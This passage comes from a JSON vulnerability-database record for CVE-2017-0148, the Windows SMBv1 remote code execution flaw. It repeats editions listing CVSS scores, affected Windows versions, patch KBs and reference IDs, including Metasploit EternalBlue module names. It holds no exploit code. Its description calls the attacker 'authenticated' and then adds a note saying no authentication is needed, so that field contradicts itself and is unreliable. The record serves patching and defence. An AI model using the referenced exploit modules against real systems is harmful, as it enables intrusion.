"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T10:44:22", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-07T10:44:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012212", "KB3213986", "KB3210720", "KB3205401", "KB4012598", "KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4013429", "KB4012216", "KB4012606", "KB3210721", "KB4012215", "KB3205409", "KB4012213", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:22", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server. (Note: the CVSS v2 vector recorded for this entry is Au:N and the CVSS v3 vector is PR:N, i.e. no authentication is required to reach the vulnerable SMBv1 request handling; treat the exposure as unauthenticated network access.)\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-08T14:45:18", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T14:45:18", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-08T14:45:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4012214", "KB4012217", "KB4012212", "KB4013429", "KB4012213", "KB3210721", "KB3212646", 
"KB3210720", "KB4012606", "KB3177186", "KB4012216", "KB3205409", "KB3213986", "KB4012598", "KBMS16-110, 3187754", "KB4013198", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:18", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server. (Note: the CVSS v2 vector recorded for this entry is Au:N and the CVSS v3 vector is PR:N, i.e. no authentication is required to reach the vulnerable SMBv1 request handling; treat the exposure as unauthenticated network access.)\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-08T16:54:43", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4012216", "KB3205401", "KB3205409", "KB4012215", "KB4012212", "KB3177186", "KB4013429", "KB3212646", "KB3210721", "KB4012213", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB4012217", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
